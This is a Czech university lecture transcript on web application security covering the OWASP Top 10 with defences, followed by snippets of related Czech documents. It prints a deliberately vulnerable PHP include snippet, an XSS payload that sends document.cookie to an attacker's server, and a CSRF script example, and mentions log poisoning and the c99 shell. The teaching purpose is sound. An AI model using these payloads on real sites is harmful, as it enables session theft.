Bezpečnost a bezpečné programování

Rozměr: px
Začít zobrazení ze stránky:

Download "Bezpečnost a bezpečné programování"

Transkript

1 Bezpečnost a bezpečné programování 10. Bezpečnost webových aplikací Ing. Tomáš Zahradnický, EUR ING, Ph.D. České vysoké učení technické v Praze Fakulta informačních technologií Katedra počítačových systémů Příprava studijních programů Informatika pro novou fakultu ČVUT je spolufinancována Evropským sociálním fondem a rozpočtem Hlavního města Prahy v rámci Operačního programu Praha adaptabilita (OPPA) projektem CZ.2.17/3.1.00/31952 Příprava a zavedení nových studijních programů Informatika na ČVUT v Praze. Praha & EU: Investujeme do vaší budoucnosti T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

2 OWASP Top 10 bezpečnostních risků pro rok 2010 [2] 1 Injekce 2 Cross-site Scripting (XSS) 3 Špatná správa sessions 4 Insecure Direct Object References 5 Cross-Site Request Forgery (XSRF) 6 Security Misconfiguration 7 Insecure Cryptographic Storage 8 Failure to Restrict URL Access 9 Insufficient Transport Layer Protection 10 Unvalidated Redirects and Forwards T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

3 Injekce SQL Podrobně na přednášce 9. Injekce je běžná, snadno exploitovatelná a může mít rozsáhlé následky, zvláště, pokud je použit pro připojení k DB účet s vysokou úrovní oprávnění. Ochrana před injekcí: Důsledně kontrolovat veškerý vstup, který bude předáván DB a zajistit jeho správné escapování. Vyhnout se dynamicky generovaným dotazům všude, kde je to jen možné. Používat parametrizované dotazy Používat procedury T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

4 Injekce Souboru (File Inclusion) I Velmi nebezpečný a velmi často používaný útok. Jde o útok na include souborů, jejichž jméno je dynamické. Server načte buď vzdálený soubor zadaný útočníkem (Remote File Inclusion, RFI), anebo lokální soubor (Local File Inclusion, LFI). U RFI soubor obsahuje exploit např. shell c99.php. U LFI jde o zranitelnost typu Information Disclosure a v kombinaci s jinými metodami lze dosáhnout také spuštění exploitu. Game over. Skript očekává, že hodnota parametru COLOR bude jméno barvy, řekněme red anebo blue, a podle toho načte (a spustí) odpovídající soubor.php. Útočník ale namísto barvy zadá například kořist.php <?php $color = blue ; if( isset( $_GET[ COLOR ] ) ) $color = $_GET[ COLOR ]; include( $color..php );?> URL (RFI), nebo soubor (LFI). T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

5 Injekce Souboru (File Inclusion) II Pokud RFI selhává, ale funguje LFI, je nutné škodlivý kód dostat na server jiným způsobem například pomocí log poisoning: Při přístupu k neexistujícímu souboru X se do přístupového logu zapíše informace, o tom, že byl žádán soubor X a že neexistoval. Pokud útočník jako jméno souboru dá kód exploitu, je zanesen do logu. Pomocí LFI pak stačí si nechat vypsat z disku přístupový log, a tím může dojít ke spuštění kódu exploitu. Obrana proti RFI/LFI: Důsledně kontrolujte, jaké soubory includujete do vašich skriptů. Zvažte implementaci chroot jailu. U PHP vypněte v php.ini nastavení allow_url_fopen a allow_url_include. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

6 Cross-site Scripting (XSS) I XSS je velmi rozšířený způsob útoků, který je středně obtížný, a který může mít středně závažné následky. XSS nastává, pokud není uživatelský vstup dostatečně prověřen a dostane se (na výstup) do serverem generovaných stránek. S příchodem Web 2.0 a technologiemi jako například AJAX je XSS obtížněji detekovatelné. JavaScript se zranitelností na XSS page += "<input name= card type= text value= " + request.getparameter("card") + " >"; Útočník namísto čísla kreditní karty zadá řetězec: ><script>document.location = + document.cookie </script><input type= hidden name= a value= T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

7 Cross-site Scripting (XSS) II Namísto očekávaného HTML <input name= card type= text value= > Dostáváme HTML <input name= card type= text value= > <script>document.location = + document.cookie</script> <input type= hidden name= a value= > Modře je náš kód, červeně vstup zadaný uživatelem (útočníkem). Důsledky: vložený kód načte cookie pro doménu, ve které je napadená stránka, cookie odešle na server bž.com, který ji dá k dispozici útočníkovi, pokud se cookie používá pro autentizaci ap., může se útočník pokusit vydávat za nás (impersonation) a vůbec nepotřebuje znát naše heslo. Obrana proti XSS Správně escapovat všechen uživatelský vstup. Používat whitelisting. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

8 Špatná správa sessions I Běžný typ útoku, který může mít závažné následky. Uživatel se připojí k serveru a je mu zřízena nová session, do které server ukládá uživatelská data. Session id je unikátní pro každého uživatele a často se ukládá do cookie, anebo i přímo do URL: Útočník může zcizit session id (hodnotu parametru sid) přímo z URL, nachytaného síťového provozu, anebo prostřednictvím XSS, a použít ho na jiném počítači k vydávání se za okradeného uživatele (session hijacking). Pokud je serveru podstrčeno session id a nedochází k jeho vytvoření serverem, mluvíme o session fixation. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

9 Špatná správa sessions II Ochrana proti session hijacking: Používejte šifrování na úrovni transportní vrstvy. Velmi ztíží útok odchytem síťového provozu, ale neuchrání vás přes XSS. Je třeba se bránit i proti XSS. Je vhodné svázat session id s IP adresou, user agentem a případně i dalšími údaji o uživateli například formou MD5 hashe. Pokud někdo zcizí a použije uživatelovo session id, je téměř vyloučené, že hash bude stejný a přístup bude zamítnut. Ochrana proti session fixation: Nastavujte pro každou session expiraci a důsledně ukončujte (vymazávejte) každou session při odhlašování uživatele. Ponechávejte uživatelská data, ale měňte u nich session id (regenerujte session). Pokud jste opravdu paranoidní, měňte session id při každém požadavku. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

10 Insecure Direct Object References I Aplikace často používají jména objektů jako parametry, které se později propagují do nižších vrstev, ke kterým již daný uživatel nutně nemusí mít právo přístupu: Příklad v C++ String* query = S"SELECT * FROM zamestnanci WHERE user =?"; OldDbConnection* conn = new OldDbConnection(connectionString); OleDbCommand* command = new OleDbCommand(query, conn); conn->open(); command->parameters->add(new OleDbParameter( S"user", OleDbType::VarChar)); command->parameters[ S"user" ]->Value = JMENO_UZIVATELE_Z_WEB_DOTAZU ; OleDbDataReader* reader = command->executereader(); try{ while( reader->read() ) { reader->getstring( CISLO_SLOUPCE_Z_WEB_DOTAZU ); } } finally { reader->close(); conn->close(); } T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

11 Insecure Direct Object References II Když uživatel (útočník) změní URL, ze kterého se přímo používá část jako jméno sloupce v DB pro selekci a číslo sloupce pro projekci: získá uživatel data jiného uživatele změnou uživatelského jména v dotazu (Information Disclosure)? získá uživatel informaci z jiného sloupce databáze změnou čísla sloupce v dotazu (Information Disclosure)? Doporučení: Snažte se vyhnout přímému použití jmen, které se budou mapovat přímo na jména objektů a používejte raději nepřímé odkazy na objekty. Pamatujte, že reference mohou být per user anebo i per session. Ověřujte, zda daný webový uživatel, který se nutně nemusí shodovat s uživatelem DB má opravdu právo k dané položce DB přistupovat. Příklad. U HTML elementu input typ option bude mít atribut value hodnotu MD5 hashe, která bude počítána z identifikátoru session a pořadového číslo položky. Hashe pak lze snano mapovat na názvy objektů a při té příležitosti kontrolovat práva uživatele. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

12 Cross-Site Request Forgery (XSRF, CSRF) I Ten typ útoku je také velmi běžný. Útočník nastraží na webovou stránku škodlivý kód, který je přistupující obětí vykonán. Kód je spuštěn z počítače oběti, která se tak stává původcem následků kódu. Příklad CSRF Uživatel (oběť útoku) používá internetové bankovnictví od České předražené banky, a.s. Programátor bankovní aplikace ukládá, po úspěšné autentizaci uživatele, do cookie číslo session, které je nezbytnou součástí každé bankovní transakce. Útočník zřídí webovou stránku, na kterou umístí škodlivý kód, řekněme takto (možností je opravdu mnoho): <bgsound src=javascript:alert(([kód]))> Útočník pošle uživateli v HTML, případně jinak přiměje oběť spustit jím zadaný kód. Tento kód se připojí ke stránkám banky, a protože je spuštěn z prostředí uživatele, je proveden ze stejného počítače, stejné IP adresy, a protože má uživatel stále přítomnu cookie se správnou autentizací, je, aniž by o tom uživatel věděl, proveden pod jeho účtem platební příkaz převádějící peníze na účet útočníka. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

13 Cross-Site Request Forgery (XSRF, CSRF) II Poznámky k omezení možností útoku přes CSRF: Používejte metodu POST namísto metody GET všude, kde je to jen možné. V PHP používejte proměnnou $_POST a ne $_REQUEST, ikdyž je to méně pohodlné! Je vhodné do každé stránky a i linky v ní vložit kus dat unikátních pro každého uživatele (token). Pro útočníka bude téměř nemožné token uhodnout, zvláště, když bude platnost tokenu časově omezena. Pokud token v některé lince chybí, může útočník vytvořit linku vedoucí na vaši stránku a uspět s CSRF. Hodnotu tokenu ověřovat vždy před provedením citlivé operace. Token je vhodné umístit do vstupního pole typu hidden. Pokud je token součástí URL, je snažší pro útočního ho zachytit, a proto je důležité, aby měly tokeny svoji časovou platnost. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

14 Security Misconfiguration Dalším běžným problémem, který lze snadno odhalit a snadno zneužít. Špatné nastavení zabezpečení se může odehrát na mnoha místech (aplikace, webový server, aplikační server, databázový server, použité knihovny, firewall, vlastní nastavení OS, atd.). Za špatné nastavení můžeme považovat i příliš detailní výpisy chyb, které mohou útočníkovi mnoho napovědět. Příklad. Vaše aplikace používá knihovnu X, ve které je objevena zranitelnost. Jak dlouho bude vaše aplikace díky chybě knihovny X zranitelná? Příklad. Zapomenete na webserveru vypnout výpis adresářů. Díky tomu může útočník procházet adresáře a stáhnout si jakýkoliv soubor například PHP skripty ve zdrojové formě. Příklad. Zapomenete vymazat výchozí uživatele u DB serveru. Příklad. Váš server je dostupný přímo přes Remote Desktop do světa! T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

15 Insecure Cryptographic Storage Častá chyba, která se však obtížně detekuje, snadno exploituje a má závažné následky. Podrobně viz přednáška 7. Doporučení [2]: Po zvážení všech hrozeb, před kterými chcete ochránit data se ujistěte, že používáte šifrování všude, kde je to nezbytné a používáte silné, současné a standardní šifrovací algoritmy. Ujistěte se, že zálohy dat jsou šifrovány odděleně od klíčů, které jsou spravovány odděleně. Ujistěte se, že používáte standardní silné šifrovací algoritmy a silné klíče, a že používáte bezpečnou správu klíčů. Ujistěte se, že přístupová hesla jsou hashována pomocí současných standardních hashovacích algoritmů a že používáte solení. Ujistěte se, že všechny klíče a hesla jsou ochráněny před neautorizovaným přístupem. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

16 Failure to Restrict URL Access Ne zcela běžný typ problému, zato snadno exploitovatelný. Aplikace ne vždy správně ošetřují požadavky na stránky. Přístup k URL bývá nastaven na úrovni: konfiguračního souboru může být špatně nastaven, a/nebo na úrovni programu snadno se stane, že se na takové ošetření zapomene. Často se stává, že je neautorizovanému uživateli dovoleno přistoupit k autorizovaným souborům, anebo je běžnému uživateli umožněno přistoupit ke stránkám, které vyžadují vyšší úroveň oprávnění. Příklad špatného omezení Než je klientovi naší webové aplikace vůbec dovoleno přistoupit k URL naší webové aplikace, musí se autentizovat našemu serveru. Autentizaci i správu uživatelů ponecháme na OS. Po úspěšné autentizaci je uživateli umožněn přístup k jedné či více URL na serveru. Naše aplikace je psána v ASP.Net a rozlišuje 3 úrovně přístupu: zákazník, prodejce a administrátor. OS tedy povoluje zdali přístup vůbec povolit a naše aplikace se rozhoduje má-li klient právo s danou stránkou pracovat. Často se stává, že vývojář aplikace zapomene ověřit, jestli může klient s danou stránkou pracovat. Klientovi pak stačí přepsat část URL, čímž může získat přístup do jemu nepříslušející části aplikace. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

17 Insufficient Transport Layer Protection Častá chyba, kterou lze snadno detekovat, ale je složité ji exploitovat. Aplikace často nechrání síťový provoz. Mohou sice používat SSL/TLS pro autentizaci, ale dále již ne a je tedy možné pomocí síťového analyzátoru zachytit data, identifikátor session ap. Dalším problémem je nesprávné použití certifikátů, které způsobí zobrazení varování uživateli. Zkuste si nachytat trochu síťového provozu vaší webové aplikace. Možná budete hodně překvapeni! Doporučení: Vyžazujte použití SSL na všech citlivých stránkách. Všechny požazavky na ne-ssl zabezpečené stránky by měly být přesměrovány na stránky používající SSL. Všechny citlivé cookies by měly mít nastaven příznak secure. Nastavte SSL tak, aby podporoval jen silné algoritmy (FIPS 140-2). Ujistěte se, že váš certifikát je platný, neexpiroval, nebyl zrušen a obsahuje všechny domény vaší stránky. T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

18 Unvalidated Redirects and Forwards I Ne zcela běžná chyba, která je zato velmi snadno exploitovatelná. Aplikace často potřebují provést přesměrovat uživatele na jinou stránku. Někdy pro tyto účely používají část URL. Pokud cíl přesměrování není dostatečně zabezpečen, může být stránka zneužita k přesměrování na jinou, mimo naší website, škodilou stránku. Uživatel žije v domnění, že útočníkem zaslaný link je neškodný, protože přece zná naši společnost, a proto je vysoká šance, že útočníkovu linku spustí. Příklad 1 T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

19 Unvalidated Redirects and Forwards II Příklad 2 někdy ani nemusí použít redirekt! Doporučení: Zkuste se vyhnout použití redirektů a forwardů. Když už musíme, nenechávejte část URL určit kam přesměrovat. Když opravdu není jiná cesta, ujistěte se, že je redirekt platný a možný pro daného uživatele. Do URL přidejte jako další parametr MAC (tedy hash z cíle přesměrování a nějakého tajného klíče). Stránka provádějící přesměrování MAC ověří a provede forward anebo skončí s chybou. Poznámka. Při přesměrování požadavků na systém plateb GPWebPay musí URL povinně obsahovat dokonce digitální podpis všech ostatních předaných parametrů! T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

20 Bibliografie Howard M., LeBlanc D.: Writing Secure Code, 2 nd edition, Microsoft Press, OWASP Foundation: Open Web Application Security Project, Page, T. Zahradnický (ČVUT FIT) Bezpečnost webových aplikací MI-BPR, 2011, Předn / 20

Testování webových aplikací Seznam.cz

Testování webových aplikací Seznam.cz Testování webových aplikací Seznam.cz Roman Kümmel Bezpečnostní hrozby Síťové prvky, servery VPN, Remote desktop Webové aplikace DoS, DDoS Sociotechnika Wi-Fi Útoky proti uživatelům Útoky proti aplikaci

Více

Hitparáda webhackingu nestárnoucí hity. Roman Kümmel

Hitparáda webhackingu nestárnoucí hity. Roman Kümmel Hitparáda webhackingu nestárnoucí hity Roman Kümmel Bezpečnostní hrozby Síťové prvky, servery VPN, Remote desktop Webové aplikace DoS, DDoS Sociotechnika Wi-Fi Útoky proti uživatelům Útoky proti aplikaci

Více

Šifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013

Šifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013 Šifrování Autentizace ní slabiny 22. března 2013 Šifrování Autentizace ní slabiny Technologie Symetrické vs. asymetrické šifry (dnes kombinace) HTTPS Funguje nad HTTP Šifrování s pomocí SSL nebo TLS Šifrování

Více

Zranitelnosti webových aplikací. Vlastimil Pečínka, Seznam.cz Roman Kümmel, Soom.cz

Zranitelnosti webových aplikací. Vlastimil Pečínka, Seznam.cz Roman Kümmel, Soom.cz Zranitelnosti webových aplikací Vlastimil Pečínka, Seznam.cz Roman Kümmel, Soom.cz Terminologie Zranitelnost (vulnerability) Slabina, která umožní utočníkovi snížit/obejít ochranu dat a informací Security

Více

Demilitarizovaná zóna (DMZ)

Demilitarizovaná zóna (DMZ) Demilitarizovaná zóna (DMZ) Bezpečnostní seminář ČP AFCEA Aktuální trendy v zabezpečení DMZ Dalibor Sommer/ březen 2013 Agenda HP Enterprise Security Strategy Aktuální bezpečnostní hrozby SDN a jeho využití

Více

Třídy a objekty. Třídy a objekty. Vytvoření instance třídy. Přístup k atributům a metodám objektu. $z = new Zlomek(3, 5);

Třídy a objekty. Třídy a objekty. Vytvoření instance třídy. Přístup k atributům a metodám objektu. $z = new Zlomek(3, 5); Programovací jazyk PHP doc. Ing. Miroslav Beneš, Ph.D. katedra informatiky FEI VŠB-TUO A-1007 / 597 324 213 http://www.cs.vsb.cz/benes Miroslav.Benes@vsb.cz Obsah Třídy a objekty Výjimky Webové aplikace

Více

Bezpečnost a bezpečné programování

Bezpečnost a bezpečné programování Bezpečnost a bezpečné programování 9. Databáze a bezpečnost Ing. Tomáš Zahradnický, EUR ING, Ph.D. České vysoké učení technické v Praze Fakulta informačních technologií Katedra počítačových systémů Příprava

Více

PHP a bezpečnost. nejen veřejná

PHP a bezpečnost. nejen veřejná PHP a bezpečnost nejen veřejná Navrhujeme bezpečné aplikace Efektivně spustitelných skriptů by mělo být co nejméně. V ideálním případě jen jeden "bootstrap" skript (index.php). Případně jeden bootstrap

Více

1. Webový server, instalace PHP a MySQL 13

1. Webový server, instalace PHP a MySQL 13 Úvod 11 1. Webový server, instalace PHP a MySQL 13 Princip funkce webové aplikace 13 PHP 14 Principy tvorby a správy webového serveru a vývojářského počítače 14 Co je nezbytné k instalaci místního vývojářského

Více

Instalace a konfigurace web serveru. WA1 Martin Klíma

Instalace a konfigurace web serveru. WA1 Martin Klíma Instalace a konfigurace web serveru WA1 Martin Klíma Instalace a konfigurace Apache 1. Instalace stáhnout z http://httpd.apache.org/ nebo nějaký balíček předkonfigurovaného apache, např. WinLamp http://sourceforge.net/projects/winlamp/

Více

17. července 2005 15:51 z moravec@yahoo.com http://www.z-moravec.net/

17. července 2005 15:51 z moravec@yahoo.com http://www.z-moravec.net/ 17. července 2005 15:51 z moravec@yahoo.com http://www.z-moravec.net/ Úvod 1 Úvod Nedávno jsem zveřejnil návod na vytvoření návštěvní knihy bez nutnosti použít databázi. To je výhodné tehdy, kdy na serveru

Více

Cross- Site Request Forgery

Cross- Site Request Forgery Prez en tace k p řed n ášce o CSRF ú tocích Přip raven o p ro SOOM session #4 2007 Jiné ozna ení této zranitelnosti č Cross- Site Request Forgery CSRF Cross- Site Reference Forgery XSRF Historie CSRF (první

Více

Vývoj Internetových Aplikací

Vývoj Internetových Aplikací 10 Vývoj Internetových Aplikací Bezpečnost Ing. Michal Radecký, Ph.D. www.cs.vsb.cz/radecky https://www.ted.com/talks/mikko_hypponen_fighting_ viruses_defending_the_net Co je to Cyber kriminalita http://www.internetprovsechny.cz/pocitacova-kriminalita-a-bezpecnost/

Více

SSL Secure Sockets Layer

SSL Secure Sockets Layer SSL Secure Sockets Layer internetové aplikační protokoly jsou nezabezpečené SSL vkládá do architektury šifrující vrstvu aplikační (HTTP, IMAP,...) SSL transportní (TCP, UDP) síťová (IP) SSL poskytuje zabezpečenou

Více

1 Webový server, instalace PHP a MySQL 13

1 Webový server, instalace PHP a MySQL 13 Úvod 11 1 Webový server, instalace PHP a MySQL 13 Princip funkce webové aplikace 13 PHP 14 Principy tvorby a správy webového serveru a vývojářského počítače 14 Co je nezbytné k instalaci místního vývojářského

Více

Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni

Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni Webové aplikace Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni Harmonogram Dopolední blok 9:00 12:30 Ing. Dostal Úvod, XHTML + CSS Ing. Brada,

Více

Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost

Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost Projekt je realizován v rámci Operačního programu Vzdělávání pro konkurence

Více

INFORMAČNÍ SYSTÉMY NA WEBU

INFORMAČNÍ SYSTÉMY NA WEBU INFORMAČNÍ SYSTÉMY NA WEBU Webový informační systém je systém navržený pro provoz v podmínkách Internetu/intranetu, tzn. přístup na takový systém je realizován přes internetový prohlížeč. Použití internetového

Více

24.5.2008 Jaku b Su ch ý 1

24.5.2008 Jaku b Su ch ý 1 Drupal API 24.5.2008 Jaku b Su ch ý 1 Témata Práce s databází Bezpečnost práce s Drupalem Forms API Jak udělat vlastní modul Hooks Lokalizace 24.5.2008 Jaku b Su ch ý 2 Práce s databází Drupal poskytuje

Více

Bezpečnost internetového bankovnictví, bankomaty

Bezpečnost internetového bankovnictví, bankomaty , bankomaty Filip Marada, filipmarada@gmail.com KM FJFI 15. května 2014 15. května 2014 1 / 18 Obsah prezentace 1 Bezpečnost internetového bankovnictví Možná rizika 2 Bankomaty Výběr z bankomatu Možná

Více

Koláčky, sezení. Martin Klíma

Koláčky, sezení. Martin Klíma Koláčky, sezení Martin Klíma UDRŽOVÁNÍ STAVU APLIKACE Udržování stavu aplikace 1. Pomocí skrytých polí (viz příklad wizard) 2. Pomocí obohacování odkazů 3. Pomocí cookies 4. Pomocí sessions Obohacování

Více

Obsah přednášky. Představení webu ASP.NET frameworky Relační databáze Objektově-relační mapování Entity framework

Obsah přednášky. Představení webu ASP.NET frameworky Relační databáze Objektově-relační mapování Entity framework Web Jaroslav Nečas Obsah přednášky Představení webu ASP.NET frameworky Relační databáze Objektově-relační mapování Entity framework Co to je web HTTP protokol bezstavový GET POST HEAD Cookies Session HTTPS

Více

Desktop systémy Microsoft Windows

Desktop systémy Microsoft Windows Desktop systémy Microsoft Windows IW1/XMW1 2013/2014 Jan Fiedor, přednášející Peter Solár ifiedor@fit.vutbr.cz, solar@pocitacoveskoleni.cz Fakulta Informačních Technologií Vysoké Učení Technické v Brně

Více

Internet Information Services (IIS) 6.0

Internet Information Services (IIS) 6.0 Internet Information Services (IIS) 6.0 V operačním systému Windows Server 2003 je obsažena i služba IIS v 6.0. Služba IIS poskytuje jak www server tak i některé další služby (FTP, NNTP,...). Jedná se

Více

Web Application Security aneb další. rozměr hackingu. XanthiX Soom session IV

Web Application Security aneb další. rozměr hackingu. XanthiX Soom session IV Web Application Security aneb další rozměr hackingu XanthiX Struktura Uvedení do problematiky Vlastní výzkum v oblasti WAS Praktické ukázky Síla XSS aneb may the force be with you! Prohlížeč nebo systém

Více

Internet Banka v mobilu

Internet Banka v mobilu Internet Banka v mobilu Obsah Co je Internet Banka v mobilu?... 3 Co umí Internet Banka v mobilu?... 3 Kdo může používat Internet Banku v mobilu?... 3 Na jakých telefonech Internet Banka v mobilu funguje?...

Více

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Číslo projektu: Číslo šablony: 28 CZ.1.07/1.5.00/34.0410 Název materiálu: Ročník: Identifikace materiálu: Jméno autora: Předmět: Tématický celek:

Více

Modelování hrozeb. Hana Vystavělová AEC, spol. s r.o.

Modelování hrozeb. Hana Vystavělová AEC, spol. s r.o. Modelování hrozeb Hana Vystavělová AEC, spol. s r.o. Agenda Možné způsoby identifikace rizik Úskalí analýzy rizik Modelování hrozeb metodiky Modelování hrozeb ukázky Výhody a přínosy modelování hrozeb

Více

Manuál pro implementaci služby PLATBA 24. Datum: 17. prosince 2014 Verze: 1.49

Manuál pro implementaci služby PLATBA 24. Datum: 17. prosince 2014 Verze: 1.49 Manuál pro implementaci služby PLATBA 24 Datum: 17. prosince 2014 Verze: 1.49 1 Úvodní informace ke službě PLATBA 24... 3 1.1 Obecný popis služby... 3 1.2 Administrativní předpoklady k využití služby PLATBA

Více

Střední odborná škola a Střední odborné učiliště, Hořovice

Střední odborná škola a Střední odborné učiliště, Hořovice Kód DUM : VY_32_INOVACE_DYN.1.18 Název materiálu: Anotace Autor Jazyk Očekávaný výstup 18 PHP- Základy práce s databází PHP - MySQL DUM naučí žáky postupu při vytvoření, připojení databáze a vytvoření

Více

Úvodem 9. Zpětná vazba od čtenářů 10 Zdrojové kódy ke knize 10 Errata 10. Než začneme 11

Úvodem 9. Zpětná vazba od čtenářů 10 Zdrojové kódy ke knize 10 Errata 10. Než začneme 11 Obsah Úvodem 9 Zpětná vazba od čtenářů 10 Zdrojové kódy ke knize 10 Errata 10 Kapitola 1 Než začneme 11 Dynamické vs. statické stránky 11 Co je a k čemu slouží PHP 12 Instalace potřebného softwarového

Více

Západočeská univerzita v Plzni Fakulta aplikovaných věd Katedra informatiky a výpočetní techniky. v EEG/ERP portálu

Západočeská univerzita v Plzni Fakulta aplikovaných věd Katedra informatiky a výpočetní techniky. v EEG/ERP portálu Západočeská univerzita v Plzni Fakulta aplikovaných věd Katedra informatiky a výpočetní techniky Diplomová práce Systém oprávnění v EEG/ERP portálu Plzeň, 2011 Jiří Vlašimský Prohlášení Prohlašuji, že

Více

Vstupní požadavky, doporučení a metodické pokyny

Vstupní požadavky, doporučení a metodické pokyny Název modulu: Základy PHP Označení: C9 Stručná charakteristika modulu Modul je orientován na tvorbu dynamických stánek aktualizovaných podle kontextu volání. Jazyk PHP umožňuje velmi jednoduchým způsobem

Více

Administrace Oracle. Práva a role, audit

Administrace Oracle. Práva a role, audit Administrace Oracle Práva a role, audit Filip Řepka 2010 Práva (privileges) Objekty (tabulky, pohledy, procedury,...) jsou v databázi logicky rozděleny do schémat. Každý uživatel má přiděleno svoje schéma

Více

wplatba SOAP api Technická dokumentáce

wplatba SOAP api Technická dokumentáce wplatba SOAP api Technická dokumentáce 1 OBSAH ÚČEL DOKUMENTU... 3 TECHNICKÝ KONTAKT... 3 LEGENDA... 3 PLATEBNÍ METODY... 4 KOMUNIKACE... 4 TESTOVÁNÍ... 4 JAK POSTUPOVAT V PŘÍPADĚ PROBLÉMŮ... 4 CARDPAY...

Více

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) Cross-Site Scripting (XSS) Bc. Aleš Joska Vysoká škola báňská Technická univerzita Ostrava Fakulta elektrotechniky a informatiky 3. duben 2018 Aleš Joska Cross-Site Scripting (XSS) 3. duben 2018 1 / 16

Více

FIO API PLUS. Verze 1.1.1

FIO API PLUS. Verze 1.1.1 FIO API PLUS Verze 1.1.1 www.fio.cz Verze 29. 5. 2015 OBSAH: 1 FUNKČNÍ POPIS... 2 2 INSTALACE APLIKACE... 2 3 ZÍSKÁNÍ TOKENU... 2 4 PŘIDÁNÍ ÚČTU / TOKENU DO APLIKACE... 3 5 STAŽENÍ DAT... 3 Periodické

Více

8.2 Používání a tvorba databází

8.2 Používání a tvorba databází 8.2 Používání a tvorba databází Slide 1 8.2.1 Základní pojmy z oblasti relačních databází Slide 2 Databáze ~ Evidence lidí peněz věcí... výběry, výpisy, početní úkony Slide 3 Pojmy tabulka, pole, záznam

Více

Generování žádosti o certifikát Uživatelská příručka

Generování žádosti o certifikát Uživatelská příručka Generování žádosti o certifikát Uživatelská příručka První certifikační autorita, a.s. Verze 1.0 Obsah 1. Úvod... 3 2. Požadavky na software... 3 3. Kontrola softwarového vybavení... 4 4. Vyplnění údajů

Více

Administrace služby - GTS Network Storage

Administrace služby - GTS Network Storage 1. Návod k ovládání programu Cisco VPN Client (IP SECový tunel pro přístup GTS Network Storage) Program Cisco VPN client lze bezplatně stáhnout z webových stránek GTS pod odkazem: Software ke stažení http://www.gts.cz/cs/zakaznicka-podpora/technicka-podpora/gtspremium-net-vpn-client/software-ke-stazeni.shtml

Více

Zabezpečení webové vrstvy a EJB projektu Část nastavení specifická pro Glassfish, část dána Java EE

Zabezpečení webové vrstvy a EJB projektu Část nastavení specifická pro Glassfish, část dána Java EE X33EJA Security, Realms Zabezpečení webové vrstvy a EJB projektu Část nastavení specifická pro Glassfish, část dána Java EE 'web.xml' 'glassfish-web.xml' dále nutno nastavit realm v admin. konzoli GF 1

Více

PLATEBNÍ KARTY PPF banky a.s.

PLATEBNÍ KARTY PPF banky a.s. PLATEBNÍ KARTY PPF banky a.s. PPF banka a.s., Evropská 2690/17, P.O. Box 177, 160 41 Praha 6 1/14 Obsah: 1. Všeobecné informace...3 2. Placení prostřednictvím Karty na internetu...3 3. 3D Secure...4 3.1.

Více

Efektivní řízení rizik webových a portálových aplikací

Efektivní řízení rizik webových a portálových aplikací Efektivní řízení rizik webových a portálových aplikací CLEVERLANCE Enterprise Solutions a.s. Ing. Jan Guzanič, CISA, Senior IT Security Consultant Mob.: +420 602 566 693 Email: jan.guzanic@cleverlance.com

Více

Technická specifikace Platební brána IBS

Technická specifikace Platební brána IBS Technická specifikace Platební brána IBS Verze 1 Strana 1 z 6 1. Obecné Platební brána je určena k platbě za zboží nebo služby nakoupené v internetovém obchodě, kdy uživatel je přesměrován na přihlašovací

Více

Správa stanic a uživatelského desktopu

Správa stanic a uživatelského desktopu Správa stanic a uživatelského desktopu Petr Řehoř, S.ICZ a.s. 2014 1 Správa stanic v rámci DVZ Slouží pro Zajištění opakovatelné výsledné konfigurace nových a reinstalovaných stanic Převod uživatelských

Více

Manuál pro implementaci služby PLATBA 24. Datum: 22. října 2015 Verze: 1.50

